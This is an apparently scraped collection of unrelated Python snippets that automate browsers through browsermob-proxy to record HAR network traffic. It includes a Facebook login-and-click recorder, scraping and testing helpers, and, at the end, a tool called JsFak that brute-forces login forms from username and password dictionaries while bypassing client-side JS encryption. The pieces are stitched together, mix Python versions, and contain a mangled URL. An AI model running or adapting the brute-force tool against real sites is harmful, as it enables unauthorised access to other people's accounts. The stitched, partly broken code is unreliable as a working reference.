class HarTrapper: def __init__(self): # Setup settings from congig file. config = configparser.ConfigParser() config.read('config.ini') self.PAGE = config['CAPTURE_N_HAR_FILES']['PAGE'] self.NAME = config['CAPTURE_N_HAR_FILES']['NAME'] self.URL = config['CAPTURE_N_HAR_FILES']['URL'] self.PATH = config['CAPTURE_N_HAR_FILES']['PATH'] self.USERNAME = config['CAPTURE_N_HAR_FILES']['USERNAME'] self.PASSWORD = config['CAPTURE_N_HAR_FILES']['PASSWORD'] self.N = config['CAPTURE_N_HAR_FILES']['N'] self.df = None self.server = Server(config['HAR']['SERVER_PATH']) self.server.start() self.proxy = self._start_proxy() self.driver = self._start_chrome_driver() def capture_n_har_files(self): """Run n times: Create an Har class instance. Using BrowsermobProxy start recording har data from the browser. Using selenium start a browser and go to the url. Perform the action ordered by the 'page_func' function. Create a Pandas DataFrame from the har data recorded. Close the selenium session and the proxy. Export the DataFrame to a csv file. :param page_func: A custom function for action to perform inside the webpage. :param path: csv file/s save location. :param rnd: Whether to choose a random url. :param n: Number of times to run. :param name: Record name. :param url: The web site, use full address(exm: http://www.google.com). """ print('Working...') # Enter facebook.com self.driver.get(self.URL) # Go to the 'pages' page in facebook.com self.go_to_pages() # Wait for 'c_user' cookie. while self.driver.get_cookie('c_user') is None: print('No c_user.') self.driver.implicitly_wait(2) # Click on the PAGE and close the tab N times. for i in range(int(self.N)): self.clear_cache() self.proxy.new_har(self.NAME) self.page_func() self.build_df() self.export_df(self.PATH + f'/_{i}.csv') print(f'{i}') # Finish session. self.driver.quit() self.server.stop() def _start_proxy(self): """Start a new proxy server to capture har data. :return: The new server proxy. """ run = True while run: try: proxy = self.server.create_proxy() run = False except requests.exceptions.ConnectionError as e: print(e) return proxy def _start_chrome_driver(self) -> webdriver: """Using Selenium start the google chrome browser headless. All the browser requests and responses(har_fit data) will be recorded using a BrowsermobProxy proxy server. :return: Google chrome driver object. """ chrome_options = webdriver.ChromeOptions() prefs = {"profile.default_content_setting_values.notifications": 2} chrome_options.add_experimental_option("prefs", prefs) chrome_options.set_capability('proxy', {'httpProxy': f'{self.proxy.proxy}', 'noProxy': '', 'proxyType': 'manual', 'sslProxy': f'{self.proxy.proxy}'}) # chrome_options.add_argument("--headless") driver = webdriver.Chrome(chrome_options=chrome_options) driver.set_page_load_timeout(999) driver.delete_all_cookies() return driver def clear_cache(self): cookies = self.driver.get_cookies() for cookie in cookies: name = cookie['name'] if name == 'c_user' or name == 'xs': pass else: self.driver.delete_cookie(name) def export_har(self): """Export the har_fit recording to a json file. """ with open('./har_fit.json', 'w') as file: json.dump(self.proxy.har, file) def export_df(self, path): """Export the instance DataFrame to a csv file. :param path: Export directory path. """ self.df.to_csv(path) def go_to_pages(self): timeout = 5 email_xpath = '//input[@id="email"] | //input[@name="email"]' pass_xpath = '//input[@id="pass"] | //input[@name="pass"]' login_xpath = '//input[@value="Log In"] | //button[@name="login"]' run = True while run: try: WebDriverWait(self.driver, timeout).until(EC.presence_of_element_located((By.XPATH, email_xpath))) WebDriverWait(self.driver, timeout).until(EC.presence_of_element_located((By.XPATH, login_xpath))) WebDriverWait(self.driver, timeout).until(EC.presence_of_element_located((By.XPATH, pass_xpath))) run = False except selenium.common.exceptions.NoSuchElementException: print('Login NoSuchElementException.') except selenium.common.exceptions.TimeoutException: print('Login TimeoutException.') except selenium.common.exceptions.ElementNotInteractableException: print('Login ElementNotInteractableException.') self.driver.find_element_by_xpath(email_xpath).send_keys(self.USERNAME) self.driver.find_element_by_xpath(pass_xpath).send_keys(self.PASSWORD) self.driver.find_element_by_xpath(login_xpath).click() run = True while run: try: WebDriverWait(self.driver, timeout).until( EC.presence_of_element_located((By.XPATH, '//div[text()="Pages"]'))) self.driver.find_element_by_xpath('//div[text()="Pages"]').click() run = False except selenium.common.exceptions.NoSuchElementException: print('Login NoSuchElementException.') except selenium.common.exceptions.TimeoutException: print('Login TimeoutException.') except selenium.common.exceptions.ElementNotInteractableException: print('ElementNotInteractableException') def page_func(self): """Passed to the Har.capture_n_har_files procedure for selenium to run on the web page. """ timeout = 5 liked_xpath = '//*[text() = "Liked Pages"]' page_xpath = '//span[text()="' + self.PAGE + '"]' home_xpath = '//a[text()="Home"]' # Make sure all elements exist on page before moving on. pages_window = self.driver.current_window_handle run = True while run: try: WebDriverWait(self.driver, timeout).until(EC.presence_of_element_located((By.XPATH, liked_xpath))) self.driver.find_element_by_xpath(liked_xpath).click() run = False except selenium.common.exceptions.NoSuchElementException: print('Login NoSuchElementException.') except selenium.common.exceptions.TimeoutException: print('Login TimeoutException.') except selenium.common.exceptions.ElementNotInteractableException: print('ElementNotInteractableException') run = True while run: try: WebDriverWait(self.driver, timeout).until(EC.presence_of_element_located((By.XPATH, page_xpath))) self.driver.find_element_by_xpath(page_xpath).click() run = False except selenium.common.exceptions.NoSuchElementException: print('Login NoSuchElementException.') except selenium.common.exceptions.TimeoutException: print('Login TimeoutException.') except selenium.common.exceptions.ElementNotInteractableException: print('ElementNotInteractableException') run = True while run: try: new_window = self.driver.window_handles[1] self.driver.switch_to_window(new_window) self.driver.close() self.driver.switch_to_window(pages_window) run = False except selenium.common.exceptions.NoSuchElementException: print('Login NoSuchElementException.') except selenium.common.exceptions.TimeoutException: print('Login TimeoutException.') except selenium.common.exceptions.ElementNotInteractableException: print('Login ElementNotInteractableException.') def build_df(self): """Iterate each row in the har_fit data csv file and add it to a dictionary. Add all the rows dictionaries to a list. Create one complete DataFrame from the list. :return: The instance har_fit recording data in the form of a Pandas DataFrame. """ _ = list() for entry in self.proxy.har['log']['entries']: __ = dict() for k, v in entry.items(): if type(v) == dict or type(v) == list: self._add_to_dict(__, k + '.', v) else: __[k] = v _.append(__) self.df = pd.DataFrame(_) def _add_to_dict(self, __, k, v): """Utility method for the build_df method. """ if type(v) == list: for kk, vv in v: if type(vv) == dict or type(vv) == list: self._add_to_dict(__, k + kk + '.', vv) else: __[k + kk] = vv else: for kk, vv in v.items(): if type(vv) == dict or type(vv) == list: self._add_to_dict(__, k + kk + '.', vv) else: __[k + kk] = vv
def start_local_proxy(): server = Server(PATH_TO_BROWSER_MOB_PROXY) server.start() proxy = server.create_proxy() return proxy, server
class browseWeb: headers = { 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36' } def __init__(self, root="C:/xampp/htdocs/webscrape/", folder=""): self.url = "" self.root = root + folder + "/" # Start browsermob proxy self.server = Server( r"C:\webdrivers\browsermob-proxy\bin\browsermob-proxy") self.server.start() self.proxy = self.server.create_proxy() # Setup Chrome webdriver - note: does not seem to work with headless On options = webdriver.ChromeOptions() options.binary_location = r"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" options.add_argument( '--proxy-server=%s' % self.proxy.proxy ) # Setup proxy to point to our browsermob so that it can track requests self.w = webdriver.Chrome(r'C:/webdrivers/chromedriver.exe', chrome_options=options) self.proxy.new_har("Listener", options={'captureHeaders': True}) # Request listener #self.proxy.new_har("Listener" ) # Request listener print("Browser and Server initialized...") #------------------------------------------------------ # GETTERS #------------------------------------------------------ def getCode(self): return self.w.page_source def getElement(self): return self.element def getElements(self): return self.elements def getElementCode(self, element=None): if element: return element.get_attribute('outerHTML') else: return self.element.get_attribute('outerHTML') def getTypeParam(self, by): byParam = None if by == "id": byParam = By.ID if by == "class": byParam = By.CLASS_NAME if by == "name": byParam = By.NAME if by == "tag": byParam = By.TAG_NAME if by == "text": byParam = By.PARTIAL_LINK_TEXT if by == "css": byParam = By.CSS_SELECTOR return byParam def getRequests(self): dataCollected = {} requestsList = { "js": [], "css": [], "img": [], "font": [], "json": [], "doc": [], "binary": [], "unknown": [], "total": {} } # Get list of All requests requestLog = self.proxy.har['log']["entries"] createFolder(self.root + "logs") writeFile(data=beauty(requestLog), file=self.root + "logs/har.json") print("\n[ ! ] HAR Stored! ") for entry in requestLog: if 'request' in entry.keys(): # Getting referers referer = "" headersList = entry['request']['headers'] for item in headersList: if item["name"] == "Referer": referer = item["value"] url = entry['request']['url'] obj = { "url": url, "type": entry['response']['content']['mimeType'], "size": entry['response']['bodySize'], "method": entry['request']['method'], "status": entry['response']['status'], "referer": referer } urlNew = url if "?" in url: urlNew = url.split("?")[0] # remove ? parameters from url dataCollected[urlNew] = obj # Clasifing resquests for key in dataCollected: type = dataCollected[key]["type"] url = dataCollected[key]["url"] referer = dataCollected[key]["referer"] status = str(dataCollected[key]["status"]) # if status is available if not "204" in status: # Catching mymeType of empty mimeTypes or plain mime if type == "" or "plain" in type or "None" in type: try: print("--> (" + status + " - " + type + ")Getting mimeType -> " + url) header = requests.head(url, allow_redirects=True, headers=self.headers) type = str(header.headers.get('content-type')) print("--> ( " + type + " )") except requests.exceptions.Timeout as e: print("Error Timeout: ", e) except requests.exceptions.ConnectionError as e: print("Error Connecting: ", e) except requests.exceptions.TooManyRedirects as e: print("Error, too many redirects", e) except requests.exceptions.HTTPError as e: print("Http Error", e) except requests.exceptions.RequestException as e: # catastrophic error. bail. print(e) sys.exit(1) if "image" in type: requestsList["img"].append([url, type]) elif "css" in type: requestsList["css"].append([url, type]) elif "font" in type: requestsList["font"].append([url, type]) elif "javascript" in type: requestsList["js"].append([url, type]) elif "json" in type: requestsList["json"].append([url, type]) elif "html" in type or "plain" in type: requestsList["doc"].append([url, type]) elif "octet-stream" in type: requestsList["binary"].append([url, type]) else: requestsList["unknown"].append([url, type]) # Counting resquests total = 0 for key in requestsList: subtotal = len(requestsList[key]) requestsList["total"][key] = subtotal total = total + subtotal requestsList["total"]["total"] = total self.request = requestsList return requestsList #------------------------------------------------------ # SETTERS #------------------------------------------------------ def setUrl(self, url): self.url = url def setElement(self, by, name): byParam = self.getTypeParam(by) self.element = self.w.find_element(byParam, name) return self.element def setElements(self, by, name): byParam = self.getTypeParam(by) self.elements = self.w.find_elements(byParam, name) return self.elements #------------------------------------------------------ # FUNCTIONS #------------------------------------------------------ def browseURL(self, url): print("--> Loading web -> " + url) t = time.time() self.w.implicitly_wait(30) self.w.set_page_load_timeout(30) try: self.w.get(url) except TimeoutException: print("Error loading something") print('Time consuming:', time.time() - t) self.w.execute_script("window.stop();") print("--> Loaded... ") #------------------------------------------------------- def click(self, selector=""): if selector: self.w.find_element_by_css_selector(selector).click() else: self.element.click() def enter(self, selector=""): if selector: self.w.find_element_by_css_selector(selector).send_keys(Keys.ENTER) else: self.element.send_keys(Keys.ENTER) def text(self, selector="", text=""): if selector: self.w.find_element_by_css_selector(selector).send_keys(text) else: self.element.send_keys(text) def exit(self): self.server.stop() print("Closed Proxy Server...") self.w.close() print("Closed Browser...") self.w.quit() print("Quited app...") # Killing java and webdriver process os.system("taskkill /f /im java.exe") os.system("taskkill /f /im chromedriver.exe") print("Process killed...") # ------------------------------------------------------- def waitEnableItem(self, delay=10): try: # wait for button to be enabled WebDriverWait(self.w, delay).until( EC.element_to_be_clickable((By.ID, 'getData'))) button = self.w.find_element_by_id('getData') button.click() except TimeoutException: print('Loading took too much time!') else: #html = browser.page_source pass finally: #browser.quit() pass def waitLoadedItem(self, delay=10, cssSelector=""): try: # wait for data to be loaded # e.g: cssSelector = '#dataTarget > div' WebDriverWait(self.w, delay).until( EC.presence_of_element_located((By.CSS_SELECTOR, cssSelector))) except TimeoutException: print('Loading took too much time!') else: #html = self.w.page_source pass finally: #browser.quit() pass # ------------------------------------------------------- def command(self, data): library = {"1": "start", "2": "getrequests"} # getCode from library if data.isdigit(): # if the command is a number if data in library: # if the number exist in the library data = library[data] if "start" in data: self.browseURL(self.url) elif "getrequests" in data: self.getRequests() print("-" * 30) printo(self.request) print("-" * 30) elif "click" in data: array = data.split(" ") if len(array) > 1: self.click(array[1]) elif "getcode" in data: code = self.getCode() print(code)
class SeleniumTestCase(unittest.TestCase): client = None server = None proxy = None use_proxy = True if int(os.environ.get('USE_PROXY', 0)) else False visitor_site_url = os.environ.get('VISITOR_SITE_URL', 'http://visitor.angieslist.com') legacy_url = os.environ.get('LEGACY_URL', 'http://qatools.angieslist.com') browser_clients = os.environ.get('BROWSER_CLIENTS', 'Chrome').split(',') test_browser = int(os.environ.get('TEST_BROWSER', 0)) test_client = os.environ.get('TEST_CLIENT', 'Mac OSX 10.10') browsermob_path = os.environ.get( 'BROWSERMOB_PATH', './../browsermob-proxy/bin/browsermob-proxy') browsermob_port = int(os.environ.get('BROWSERMOB_PORT', '9090')) browsermob_host = os.environ.get('BROWSERMOB_HOST', '127.0.0.1') test_legacy_user = os.environ.get('LEGACY_USER', '') test_legacy_password = os.environ.get('LEGACY_PASSWORD', '') cbt_user = os.environ.get('CBT_USER', '') cbt_key = os.environ.get('CBT_KEY', '') cbt_flag = True if int(os.environ.get('CBT_FLAG', 1)) else False char_key = None caps = {} def setUp(self): method_name = self.browser_clients[self.test_browser] if self.use_proxy: self.server = Server(self.browsermob_path, { 'host': self.browsermob_host, 'port': self.browsermob_port }) self.server.start() self.proxy = self.server.create_proxy() if self.cbt_flag: self.api_session = requests.Session() self.api_session.auth = (self.cbt_user, self.cbt_key) self.test_result = 'fail' self.caps['name'] = self.id() + ' ' + str(datetime.datetime.now()) self.caps['build'] = '1.0' # caps['browserName'] = 'Safari' # caps['version'] = '8' self.caps['browserName'] = method_name self.caps['platform'] = self.test_client self.caps['screenResolution'] = '1366x768' self.caps['record_video'] = 'true' self.caps['record_network'] = 'true' self.caps['loggingPrefs'] = {'performance': 'INFO'} try: client_method = getattr(webdriver, method_name) except AttributeError: raise NotImplementedError( "Class `{}` does not implement `{}`".format( webdriver.__class__.__name__, method_name)) try: d = getattr(DesiredCapabilities, method_name.upper()) d['loggingPrefs'] = { 'browser': 'ALL', 'driver': 'ALL', 'performance': 'ALL' } if method_name == 'Chrome': ch_profile = webdriver.ChromeOptions() ch_profile.perfLoggingPrefs = { 'enableNetwork': True, 'traceCategories': 'performance, devtools.network' } ch_profile.add_argument('incognito') ch_profile.add_argument('disable-extensions') ch_profile.add_argument('auto-open-devtools-for-tabs') ch_profile.add_argument('disable-browser-side-navigation') if self.use_proxy: ch_profile.add_argument( '--proxy-server=http://%s' % self.proxy.selenium_proxy().httpProxy) if self.cbt_flag: browser = webdriver.Remote( desired_capabilities=self.caps, command_executor= "http://%s:%[email protected]:80/wd/hub" % (self.cbt_user, self.cbt_key)) browser.implicitly_wait(20) else: browser = client_method(desired_capabilities=d, chrome_options=ch_profile) elif method_name == 'Firefox': fp = webdriver.FirefoxProfile() if self.use_proxy: fp.set_proxy(self.proxy.selenium_proxy()) if self.cbt_flag: browser = webdriver.Remote( desired_capabilities=self.caps, command_executor= "http://%s:%[email protected]:80/wd/hub" % (self.cbt_user, self.cbt_key)) browser.implicitly_wait(20) else: browser = client_method(capabilities=d, firefox_profile=fp) else: browser = client_method() browser.set_window_size(2000, 1400) self.client = browser except: print('Web browser not available') self.skiptest('Browser not available') time.sleep(1) def tearDown(self): if self.client: self.client.close() if self.server: self.server.stop() if self.cbt_flag: self.client.quit() self.api_session.put( 'https://crossbrowsertesting.com/api/v3/selenium/' + self.client.session_id, data={ 'action': 'set_score', 'score': self.test_result }) def isElementPresent(self, cssSelector): try: err_element = self.client.find_element_by_css_selector(cssSelector) return True except NoSuchElementException: return False return False def prompt_with_timeout(self, prompt, time_limit): fd = sys.stdin.fileno() old_settings = termios.tcgetattr(fd) myThread = _thread.start_new_thread(self.keypress, ()) print(prompt) for i in range(0, time_limit): self.char_key = None sleep(1) if self.char_key is not None: termios.tcsetattr(fd, termios.TCSADRAIN, old_settings) char = self.char_key self.char_key = None try: _thread.exit() except SystemExit: pass return char termios.tcsetattr(fd, termios.TCSADRAIN, old_settings) print("Continuing...") self.char_key = None return None def getch(self): fd = sys.stdin.fileno() old_settings = termios.tcgetattr(fd) try: tty.setraw(sys.stdin.fileno()) ch = sys.stdin.read(1) finally: termios.tcsetattr(fd, termios.TCSADRAIN, old_settings) return ch def keypress(self): self.char_key = self.getch() # Helper method to use after an event triggers a new page load # @param old_page - client.find_element_by_tag_name('html') grabbed BEFORE new page call # @param timeout - int seconds @contextmanager def wait_for_new_page_load(self, old_page, timeout=30): yield WebDriverWait(self.client, timeout).until(staleness_of(old_page))
class HarProfiler: def __init__(self, config, url): self.har_dir = config['har_dir'] self.browsermob_dir = config['browsermob_dir'] self.label_prefix = config['label_prefix'] or '' self.virtual_display = config['virtual_display'] self.virtual_display_size_x = config['virtual_display_size_x'] self.virtual_display_size_y = config['virtual_display_size_y'] self.label = '{}{}'.format( self.label_prefix, format(self.slugify(url)) ) self.cached_label = '{}-cached'.format(self.label) epoch = time.time() self.har_name = '{}-{}.har'.format(self.label, epoch) self.cached_har_name = '{}-{}.har'.format(self.cached_label, epoch) def __enter__(self): log.info('starting virtual display') if self.virtual_display: self.display = Display(visible=0, size=( self.virtual_display_size_x, self.virtual_display_size_y )) self.display.start() log.info('starting browsermob proxy') self.server = Server('{}/bin/browsermob-proxy'.format( self.browsermob_dir) ) self.server.start() return self def __exit__(self, type, value, traceback): log.info('stopping browsermob proxy') self.server.stop() log.info('stopping virtual display') self.display.stop() def _make_proxied_webdriver(self): proxy = self.server.create_proxy() profile = webdriver.FirefoxProfile() profile.set_proxy(proxy.selenium_proxy()) driver = webdriver.Firefox(firefox_profile=profile) return (driver, proxy) def _save_har(self, har, cached=False): if not os.path.isdir(self.har_dir): os.makedirs(self.har_dir) if not cached: har_name = self.har_name elif cached: har_name = self.cached_har_name log.info('saving HAR file: {}'.format(har_name)) with open(os.path.join(self.har_dir, har_name), 'w' ) as f: json.dump(har, f, indent=2, ensure_ascii=False) def load_page(self, url, run_cached=True): driver, proxy = self._make_proxied_webdriver() proxy.new_har(self.label) log.info('loading page: {}'.format(url)) driver.get(url) self._save_har(proxy.har) if run_cached: proxy.new_har(self.cached_label) log.info('loading cached page: {}'.format(url)) driver.get(url) self._save_har(proxy.har, cached=True) driver.quit() def slugify(self, text): pattern = re.compile(r'[^a-z0-9]+') slug = '-'.join(word for word in pattern.split(text.lower()) if word) return slug
class Get_url: PROXY_PATH = path.abspath( r"D:\Anaconda3\browsermob-proxy-2.1.4\bin/browsermob-proxy.bat") CHROME_PATH = path.abspath(r"D:\Anaconda3\chromedriver.exe") CHROME_OPTIONS = {"profile.managed_default_content_settings.images": 1} def __init__(self, url): self.url = url def open_web(self, win_size=(800, 800)): self.driver.set_window_size(*win_size) self.driver.get(self.url) def win_setting(self): enlarge_element = self.driver.find_element_by_xpath( "//div[@class='BMap_smcbg in']") for i in range(6): time.sleep(1) enlarge_element.click() def initProxy(self): """ step 4 初始化 browermobproxy 设置需要屏蔽的网络连接,此处屏蔽了css,和图片(有时chrome的设置会失效),可加快网页加载速度 新建proxy代理地址 """ self.server = Server(self.PROXY_PATH) self.server.start() self.proxy = self.server.create_proxy() def initWeb(self): chromeSettings = webdriver.ChromeOptions() chromeSettings.add_argument('--proxy-server={host}:{port}'.format( host="localhost", port=self.proxy.port)) chromeSettings.add_experimental_option("prefs", self.CHROME_OPTIONS) self.driver = webdriver.Chrome(executable_path=self.CHROME_PATH, chrome_options=chromeSettings) self.open_web() self.win_setting() def move(self, x_offset, y_offset, mode_str): def drag_left(n): for i in range(n): pag.moveTo(20, 150, 0.5) pag.dragTo(276, 150, 1) def drag_right(n): for i in range(n): pag.moveTo(276, 150, 0.5) pag.dragTo(20, 150, 1) def drag_down(n): for i in range(n): pag.moveTo(20, 406, 0.5) pag.dragTo(20, 150, 1) def drag_up(n): for i in range(n): pag.moveTo(20, 150, 0.5) pag.dragTo(20, 406, 1) def up_left_rect(x_n, y_n): for down_n in range(y_n): if (down_n % 2) == 0: drag_left(x_n) print('向左移动') else: drag_right(x_n) drag_up(1) def up_right_rect(x_n, y_n): for down_n in range(y_n): if (down_n % 2) == 0: drag_right(x_n) print('向右移动') else: drag_left(x_n) drag_up(1) def down_left_rect(x_n, y_n): for down_n in range(y_n): if (down_n % 2) == 0: drag_left(x_n) print('向左移动') else: drag_right(x_n) drag_down(1) def down_right_rect(x_n, y_n): for down_n in range(y_n): if (down_n % 2) == 0: drag_right(x_n) print('向右移动') else: drag_left(x_n) drag_down(1) x_n = int(x_offset / 256) y_n = int(y_offset / 256) if mode_str == 'up_left': up_left_rect(x_n, y_n) elif mode_str == 'up_right': up_right_rect(x_n, y_n) elif mode_str == 'down_left': down_left_rect(x_n, y_n) else: down_right_rect(x_n, y_n) def start(self): """step 8 配置monitor的启动顺序""" try: self.initProxy() self.initWeb() print('初始化完成') self.proxy.new_har('monitor', options={'captureContent': True}) time.sleep(2) next_step = 'down_right' while next_step in [ 'up_left', 'up_right', 'down_left', 'down_right' ]: self.move(2560, 2560, next_step) # 每次采集完,需调整地图回到采集原点,缩放比例尺为50米 next_step = input( '输入采集模式(up_left/up_right/down_left/down_right):') except Exception as err: print(err) def get_req_url(self, targetUrl): if self.proxy.har['log']['entries']: req_list = [] for loop_record in self.proxy.har['log']['entries']: req_url = urllib.parse.unquote(loop_record["request"]['url']) try: if re.fullmatch(targetUrl, req_url): url_dict = {} p_str = req_url.split("=")[2].replace( 'E9FA;C92E98O5K?CDI8A', '').replace('3N5L?3K8:', '') x_code, y_code = p_str.split(';EK9FJE2>C') url_dict['x_code'] = x_code url_dict['y_code'] = y_code url_dict['url'] = req_url req_list.append(url_dict) except Exception as err: print(err) continue return req_list def quit(self): """ step 9 配置monitor的退出顺序 代理sever的退出可能失败,目前是手动关闭,若谁能提供解决方法,将不胜感激 """ self.driver.close() self.driver.quit() try: self.proxy.close() self.server.process.terminate() self.server.process.wait() self.server.process.kill() except OSError: pass
from browsermobproxy import Server server = Server("/root/Desktop/browsermob-proxy-2.1.0-beta-4/bin/browsermob-proxy") server.start() proxy = server.create_proxy() from selenium import webdriver profile = webdriver.FirefoxProfile() profile.set_proxy(proxy.selenium_proxy()) driver = webdriver.Firefox(firefox_profile=profile) proxy.new_har("google") driver.get("http://www.google.co.uk") test = proxy.har # returns a HAR JSON blob print test server.stop() driver.quit()
def run_webdriver(self, start_url, port, config, download_dir): global useragent global referer urllib3_logger = logging.getLogger('urllib3') urllib3_logger.setLevel(logging.DEBUG) logging.info("Starting WebRunner") firefox_profile = None server = None proxy = None har = None if config.referer: referer = config.referer else: referer = 'http://www.google.com/search?q={}+&oq={}&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&channel=fflb&gws_rd=cr'.format( config.url, config.url) if config.useragent: useragent = config.useragent else: useragent = 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:24.0) Gecko/20100101 Firefox/24.0' logging.debug("Running with UserAgent: {}".format(useragent)) logging.debug("Running with Referer: {}".format(referer)) logging.debug("Checking URL: {}".format(config.url)) server = Server("lib/browsermob/bin/browsermob-proxy", {'port': port}) server.start() proxy = server.create_proxy() proxy.headers({'User-Agent': useragent, 'Accept-Encoding': "", 'Connection': 'Close'}) request_js = ( 'var referer = request.getProxyRequest().getField("Referer");' 'addReferer(request);' 'function addReferer(r){' 'if (! referer ) {' 'r.addRequestHeader("Referer","' + referer + '");' '}' 'return;' '}') proxy.request_interceptor(request_js) if config.firefoxprofile: firefox_profile = FirefoxProfile(profile_directory=config.firefoxprofile) else: firefox_profile = FirefoxProfile() logging.debug("Using profile {}".format(firefox_profile.path)) firefox_profile.set_preference("security.OCSP.enabled", 0) firefox_profile.set_preference("browser.download.folderList", 2) firefox_profile.set_preference("browser.download.manager.showWhenStarting", False) firefox_profile.set_preference("browser.download.dir", download_dir) firefox_profile.set_preference("browser.helperApps.neverAsk.saveToDisk", "application/x-xpinstall;application/x-zip;application/x-zip-compressed;application/octet-stream;application/zip;application/pdf;appl\ ication/msword;text/plain;application/octet") firefox_profile.set_preference("browser.helperApps.alwaysAsk.force", False) firefox_profile.set_preference("browser.download.manager.showWhenStarting", False) firefox_profile.set_preference("network.proxy.type", 1) firefox_profile.set_proxy(proxy.selenium_proxy()) try: webdriver = WebDriver(firefox_profile) proxy.new_har(start_url.hostname, options={"captureHeaders": "true", "captureContent": "true", "captureBinaryContent": "true"}) self.analyse_page(webdriver, start_url) har = proxy.har logging.info("Stopping WebRunner") proxy.close() server.stop() webdriver.quit() har = Har(har) except Exception, e: logging.error(e) proxy.close() webdriver.quit() server.stop()
class Brower_scan(): def __init__(self): self.response_result = [] self.result = {} self.args = self.init__args() self.init_browsermobproxy() self.init_chrome() self.init_dict_list() self.result_handing() self.end_env() def init__args(self): print(""" ____. ____________________ __ | |/ _____/\ _____/____ _______| | ___ | |\_____ \ | __) \__ \\\\_ __| | / / | | ____| | | | / \ | | | |/ / /\__| |/ | | | / __ \| | | | \ \________/_______ / |__ / (____ /__| |__|_ _\ \/ \/ \/ \/ Author:0xAXSDD By Gamma安全实验室 version:1.0 explain:这是一款用户绕过前端js加密进行密码爆破的工具,你无需在意js加密的细节,只需要输入你想要爆破url,已经username输入框的classname,password输入框的classname,点击登录框classname,爆破用户名,密码字典等就可,暂时不支持带验证码校验的爆破 例子: 只爆破密码:python JsFak.py -u url -user admin -Pd password.txt -cu user_classname -cp pass_classname -l login_classname 爆破密码和用户:python main.py -ud username.txt -pd password.txt -cu user_classname -cp user_classname -l user_classname -u url 详情功能参考 -h 注意:如果遇到的classname 带空格 请用""括起来 Sever服务默认的是8080端口,如果需要修改,直接点Sever类修改,并指定参数-p """) parser = argparse.ArgumentParser( description= 'Use your browser to automatically call JS encryption to encrypt your payload' ) parser.add_argument("-u", "--url", metavar='url', required=True, help="Js encryption is required url") parser.add_argument("-cu", "--class-user", metavar='class_user', required=True, help="The class name of the Username tag.") parser.add_argument("-cp", "--class-passwd", metavar='class_passwd', required=True, help="The class name of the Password tag.") parser.add_argument("-l", "--class-login", metavar='class_login', required=True, help="The class name of the Password tag.") parser.add_argument("-ud", "--Username-dict", metavar='Username_dict', help="Username dict file") parser.add_argument("-pd", "--Password-dict", metavar='Password_dict', required=True, help="Password dict file") parser.add_argument("-user", "--username", metavar='username', help="username") parser.add_argument("-f", "--out-file", metavar='out_file', help="out - file name") parser.add_argument("-p", "--port", metavar="port", help="designated port") return parser.parse_args() def init_dict_list(self): print( "------------------------------------开始扫描!--------------------------------------\n" ) if self.args.Username_dict != None: with open(self.args.Username_dict, "r") as f_u: self.username_list = f_u.readlines() for username in self.username_list: with open(self.args.Password_dict, "r") as f: self.password_list = f.readlines() for password in self.password_list: self.fill_out_a_form(username.replace('\n', ''), password.replace('\n', '')) else: with open(self.args.Password_dict, "r") as f: self.password_list = f.readlines() for password in self.password_list: self.fill_out_a_form(self.args.username, password.replace('\n', '')) self.wget_response() def init_browsermobproxy(self): try: self.server = Server( "browsermob-proxy-2.1.4\\bin\\browsermob-proxy.bat") except Exception as e: print("browsermob-proxy 服务启动失败!请查看输入路径是否正确,或者端口是否被占用!\n") return 0 self.server.start() self.proxy = self.server.create_proxy() self.chrome_options = Options() self.chrome_options.add_argument('--proxy-server={0}'.format( self.proxy.proxy)) self.chrome_options.add_argument('--headless') def init_chrome(self): try: self.chrome = webdriver.Chrome(chrome_options=self.chrome_options, executable_path='chromedriver.exe') self.proxy.new_har("ht_list2", options={'captureContent': True}) self.chrome.get(self.args.url) except Exception as e: print("Chrome浏览器启动失败!请检查是否安装了chrome浏览器\n") return 0 def fill_out_a_form(self, username, password): try: self.chrome.find_element_by_css_selector("[class='{0}']".format( self.args.class_user)).clear() self.chrome.find_element_by_css_selector("[class='{0}']".format( str(self.args.class_user))).send_keys(username) self.chrome.find_element_by_css_selector("[class='{0}']".format( self.args.class_passwd)).clear() self.chrome.find_element_by_css_selector("[class='{0}']".format( str(self.args.class_passwd))).send_keys(password) self.chrome.find_element_by_css_selector("[class='{0}']".format( self.args.class_login)).send_keys(Keys.RETURN) except Exception as e: print("Please check that the className entered is correct!\n") return 0 def wget_response(self): result = self.proxy.har for entry in result['log']['entries']: _url = entry['request']['url'] print(_url) if "password" in _url and "username" in _url: _response = entry['response'] _content = _response['content'] # 获取接口返回内容 self.response_result.append(_response['content']['text']) self.result = dict(zip(self.password_list, self.response_result)) def result_handing(self): if self.args.Username_dict != None: for username in self.username_list: for key, value in self.result.items(): if self.args.out_file != None: with open(self.args.out_file, "a", encoding="utf-8") as f: f.writelines( "账号:{user}密码:{key} :结果:{result}".format( user=username, key=key, result=value)) else: print("账号:{user}密码:{key} :结果:{result}".format( user=username, key=key, result=value)) else: for key, value in self.result.items(): if self.args.out_file != None: with open(self.args.out_file, "a", encoding="utf-8") as f: f.writelines("账号:{user}密码:{key} :结果:{result}".format( user=self.args.username, key=key, result=value)) else: print("账号:{user}密码:{key} :结果:{result}".format( user=self.args.username, key=key, result=value)) def end_env(self): try: self.server.stop() self.chrome.quit() if self.args.port == None: self.args.port = 8080 print(self.args.port) find_netstat = os.popen( "netstat -ano | findstr {port}".format(port=self.args.port)) pid = find_netstat.read().split()[4] kail_pid = os.popen("taskkill /F /PID {PID}".format(PID=pid)) print(kail_pid.read()) return 1 except IndexError as e: return 0
